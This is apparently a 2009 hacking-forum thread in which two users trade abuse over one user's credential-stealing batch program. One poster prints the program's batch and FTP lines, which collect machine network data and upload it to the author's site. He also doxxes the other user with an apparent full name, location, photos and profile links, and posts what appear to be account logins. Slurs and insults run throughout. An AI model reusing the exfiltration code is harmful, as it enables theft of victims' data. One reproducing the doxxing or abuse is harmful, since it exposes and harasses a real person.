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for stupid fuck.... XD

Posted: Wed Jul 22, 2009 12:42 pm
by boocy
ahhh now I can see why are you sooo stupid and borring....

man I forgive you, becouse I have a lot of respect for old foools :D

here is what am I talking about

Posted: Wed Jul 22, 2009 12:46 pm
by plope0726
boocy wrote:
plope0726 wrote:
boocy wrote: look do not be so proud of your self....
All you did was fuckin google for one of my victims IP adressess!!!!
and BTW I have not fail I have succeded!!!! I finished my stupid fuck all you can do is to tell to somebody that he should learn to some basics haha tat is becouse you do not know the answer and becouse of that you think you are smart actualy....
hah stupid fuck....
And you can see all my password it is located in the file called MyUploadFiles.ftp
Buth that password is not that much important to me becouse it is the free fuckin host whahaha
Yeah, I'm the stupid fuck. That's your pictures, facebook, email and full name and other information plastered all over the internet and conveniently linked to for all to see. And even if that was one of your victims IP addresses that I got, (which I'm pretty sure it's not. I'm sure you tested your fucking program on your own computer), It just so happened to be in your same location.

I see you had to delete your account there huh? Too stupid to change your password? So you program is finished huh? I find that highly unlikey.

I wonder if anyone here would like to review your pathetic prog and make there own judgment on how stupid you are, since all you program did was run ipconfig and netstat and post it to a txt file on your site. No password there either, besides you can't get a broadband connection password through the victims computer. Like I told you before it is only going to be stored in the DSL router. I gave you a link to an article that explains this but since your to damn stupid to read and research your own shit (skid?) you FAIL. You fail and being a hacker, you fail at being a cracker, and you even fail at being script kiddie. Matter of fact you just fail at life, which is evident in this douche bag picture of you that is plastered all over the internet. You look like a gay Eminem!

I shall post your lovely batch program here in just a little bit so that every one can see what a failure you are.
well I can not see any of these picthures you found on that url, and btw pussy when I just started making that program it was soo hard buth I worked 5 days on it and now it all works there is a phisher inside of him soo he catch username and password and he catch mac ID and date and time when is it uploaded...
BTW becouse of that program from this morning I allready have 5 accounts with flat service you stupid fuck....

Yeah you can;t see your photos now becsue you just deleted them. You so smart. You worked 5 whole days on it huh? and it works so great and you 5 whole accounts you says? Well golly gee that just impresses the hell out of me! :roll: Ofcourse why don;t you proove this. Lets see this information you got? Why don't you post your program and let of look at it to see how great it is?

The fact is, if you are using a "phisher" than you have succeeded at nothing. you didn't not figure a command that will dump the usernames and passwords. And you get the mac address, which is useful to you in what way if they are on the other side of the planet. Face it you aren't a hacker, hell you aren't even a script kiddie. You are pathetic little punk that thinks its cool to steal shit, but if you haven;t figure out, malicious and illegal activity is not condoned by a majority of the member on this site, and the ones who are ok with it are just like yourself, retarded. Have a nice day eminem.

BTW here is the same picture that you have posted on a nother site. ... 61155624_0

Hi5 huh? You sure love you social networking don't you?

Posted: Wed Jul 22, 2009 12:51 pm
by plope0726
Well it appears this isn't your first dumb shit post to now is it. and in the other post your were told to fuck off. What the hell is the matter with you? Can;t you take a hint? ... fe1b08b9a4

Re: for stupid fuck.... XD

Posted: Wed Jul 22, 2009 12:55 pm
by plope0726
boocy wrote:ahhh now I can see why are you sooo stupid and borring....

man I forgive you, becouse I have a lot of respect for old foools :D

here is what am I talking about
Is that all you can find? An old and fake myspace page from middle school? fucking hilarious, but once again you face at life. And BTW I worked hard to get to the age of 101, So you respect your elders boy, or is it girl? Its hard to tell based on your picture. You kinda look like a lesbian.

Posted: Wed Jul 22, 2009 1:02 pm
by boocy
plope0726 wrote:
boocy wrote:
plope0726 wrote: Yeah, I'm the stupid fuck. That's your pictures, facebook, email and full name and other information plastered all over the internet and conveniently linked to for all to see. And even if that was one of your victims IP addresses that I got, (which I'm pretty sure it's not. I'm sure you tested your fucking program on your own computer), It just so happened to be in your same location.

I see you had to delete your account there huh? Too stupid to change your password? So you program is finished huh? I find that highly unlikey.

I wonder if anyone here would like to review your pathetic prog and make there own judgment on how stupid you are, since all you program did was run ipconfig and netstat and post it to a txt file on your site. No password there either, besides you can't get a broadband connection password through the victims computer. Like I told you before it is only going to be stored in the DSL router. I gave you a link to an article that explains this but since your to damn stupid to read and research your own shit (skid?) you FAIL. You fail and being a hacker, you fail at being a cracker, and you even fail at being script kiddie. Matter of fact you just fail at life, which is evident in this douche bag picture of you that is plastered all over the internet. You look like a gay Eminem!

I shall post your lovely batch program here in just a little bit so that every one can see what a failure you are.
well I can not see any of these picthures you found on that url, and btw pussy when I just started making that program it was soo hard buth I worked 5 days on it and now it all works there is a phisher inside of him soo he catch username and password and he catch mac ID and date and time when is it uploaded...
BTW becouse of that program from this morning I allready have 5 accounts with flat service you stupid fuck....

Yeah you can;t see your photos now becsue you just deleted them. You so smart. You worked 5 whole days on it huh? and it works so great and you 5 whole accounts you says? Well golly gee that just impresses the hell out of me! :roll: Ofcourse why don;t you proove this. Lets see this information you got? Why don't you post your program and let of look at it to see how great it is?

The fact is, if you are using a "phisher" than you have succeeded at nothing. you didn't not figure a command that will dump the usernames and passwords. And you get the mac address, which is useful to you in what way if they are on the other side of the planet. Face it you aren't a hacker, hell you aren't even a script kiddie. You are pathetic little punk that thinks its cool to steal shit, but if you haven;t figure out, malicious and illegal activity is not condoned by a majority of the member on this site, and the ones who are ok with it are just like yourself, retarded. Have a nice day eminem.

BTW here is the same picture that you have posted on a nother site. ... 61155624_0

Hi5 huh? You sure love you social networking don't you?
I reallyyyy do not know where are all of these picthures you are talking abouth :? ...
BTW I could look for all of the ip's on the buth how could I know where are you from....
anyway you aint no worth it ....
it seems that I have not found a good page for hackers...
this site should be called becouse of people like you!
all you can do is to google haha :D
you stupid fuckkk.....

Posted: Wed Jul 22, 2009 2:47 pm
by plope0726
Well, as promised, here is Mr. Boocy's (little eminem) Program.

It install to a folder in the root (c:\) directory called My program containing the files listed below:

mac.txt (this file is uploaded to his site)
program.bat (same as MacDaddy.bat)
unins000.exe (the uninstall file)
UploadFiles.bat (calls the MyUploadFile.ftp file)

First start.bat runs and changes the font color in cmd to green, then calls two files: MacDaddy.bat and UploadFiles.bat like so:

#contents of start.bat
@echo off
color 02
call MacDaddy.lnk
call UploadFiles

Next MacDaddy.bat (or program.bat) Echos the date and time, runs GetMac, ipconfig and netstat (which are placed in the mac.txt file) like so:

#contents of MacDaddy.bat (and program.bat)
@echo off
Echo date: %date% - Time: %time%

Next the start.bat file calls UploadFiles.bat which in turn runs MyUploadFiles.ftp, Here's the command used.

ftp -n -i -s:MyUploadFiles.ftp

MyUploadFiles.ftp opens, logs in with username boocy and password boocy, sets type to ascii and then uploads the mac.txt file to his site. and the commands use are:

#content of My UploadFiles.ftp
user boocy boocy
send mac.txt

Of course after he couldn't change his password for this account he finally just deleted it and made a new one. I am currently in the process of finding the new one and trashing it as well. Perhaps this kid will learn eventually that he needs to learn the basics before he can be successful in anything he does and that Crime really doesn't pay. Well once again, I hope everyone has enjoyed these antics. :lol:

Posted: Wed Jul 22, 2009 4:03 pm
by boocy
plope0726 wrote:Well, as promised, here is Mr. Boocy's (little eminem) Program.

It install to a folder in the root (c:\) directory called My program containing the files listed below:

mac.txt (this file is uploaded to his site)
program.bat (same as MacDaddy.bat)
unins000.exe (the uninstall file)
UploadFiles.bat (calls the MyUploadFile.ftp file)

First start.bat runs and changes the font color in cmd to green, then calls two files: MacDaddy.bat and UploadFiles.bat like so:

#contents of start.bat
@echo off
color 02
call MacDaddy.lnk
call UploadFiles

Next MacDaddy.bat (or program.bat) Echos the date and time, runs GetMac, ipconfig and netstat (which are placed in the mac.txt file) like so:

#contents of MacDaddy.bat (and program.bat)
@echo off
Echo date: %date% - Time: %time%

Next the start.bat file calls UploadFiles.bat which in turn runs MyUploadFiles.ftp, Here's the command used.

ftp -n -i -s:MyUploadFiles.ftp

MyUploadFiles.ftp opens, logs in with username boocy and password boocy, sets type to ascii and then uploads the mac.txt file to his site. and the commands use are:

#content of My UploadFiles.ftp
user boocy boocy
send mac.txt

Of course after he couldn't change his password for this account he finally just deleted it and made a new one. I am currently in the process of finding the new one and trashing it as well. Perhaps this kid will learn eventually that he needs to learn the basics before he can be successful in anything he does and that Crime really doesn't pay. Well once again, I hope everyone has enjoyed these antics. :lol:
OK I allready told that I have changed it...
It is a diferend type of a program now
And BTW stupid fuck, nice presentation....
And if you succed to crash my other site than I will know that you aint just a google boy whahahaha
you stupid fuck :D

Posted: Wed Jul 22, 2009 4:16 pm
by plope0726
boocy wrote:
plope0726 wrote:Well, as promised, here is Mr. Boocy's (little eminem) Program.

It install to a folder in the root (c:\) directory called My program containing the files listed below:

mac.txt (this file is uploaded to his site)
program.bat (same as MacDaddy.bat)
unins000.exe (the uninstall file)
UploadFiles.bat (calls the MyUploadFile.ftp file)

First start.bat runs and changes the font color in cmd to green, then calls two files: MacDaddy.bat and UploadFiles.bat like so:

#contents of start.bat
@echo off
color 02
call MacDaddy.lnk
call UploadFiles

Next MacDaddy.bat (or program.bat) Echos the date and time, runs GetMac, ipconfig and netstat (which are placed in the mac.txt file) like so:

#contents of MacDaddy.bat (and program.bat)
@echo off
Echo date: %date% - Time: %time%

Next the start.bat file calls UploadFiles.bat which in turn runs MyUploadFiles.ftp, Here's the command used.

ftp -n -i -s:MyUploadFiles.ftp

MyUploadFiles.ftp opens, logs in with username boocy and password boocy, sets type to ascii and then uploads the mac.txt file to his site. and the commands use are:

#content of My UploadFiles.ftp
user boocy boocy
send mac.txt

Of course after he couldn't change his password for this account he finally just deleted it and made a new one. I am currently in the process of finding the new one and trashing it as well. Perhaps this kid will learn eventually that he needs to learn the basics before he can be successful in anything he does and that Crime really doesn't pay. Well once again, I hope everyone has enjoyed these antics. :lol:
OK I allready told that I have changed it...
It is a diferend type of a program now
And BTW stupid fuck, nice presentation....
And if you succed to crash my other site than I will know that you aint just a google boy whahahaha
you stupid fuck :D
You really don't learn do you? I guess I'll post you information again for the rest of the community to see. enjoy you shitty life. Oh and as for your other site...already taken care of if you can believe that...

Boocy's data!

name: boocy aka Emrah Museljic


Location: either Bihac or Vlasenica, Bosnia and Herzegovina (city may be off but the country is pretty much correct)

photograph: (there are more picture in this directory so feel free to browse around they belong to our good friend boocy)



personal web pages:
(no longer exists. ill post the new site once i gether the necessary information. Of course I'm sure he will delete that too.)

advice page:

nice little slideshows:

hi5 profile: ... mrah--html

GOOGLE Searches (google is your friend!!) ... xYPMM6r3XA ... xYPMM6r3XA ... xYPMM6r3XA

Once again you fail...

Posted: Wed Jul 22, 2009 5:38 pm
by plope0726
boocy wrote:OK I allready told that I have changed it...
It is a diferend type of a program now
And BTW stupid fuck, nice presentation....
And if you succed to crash my other site than I will know that you aint just a google boy whahahaha
you stupid fuck :D
Is this what you were looking for?

(for some reason these links wont come up but if you type them in the address bar manually they should appear)

if he has already deleted these files and his site then you can see what was found here


PS. Oh yeah username is fuckyou and password is the same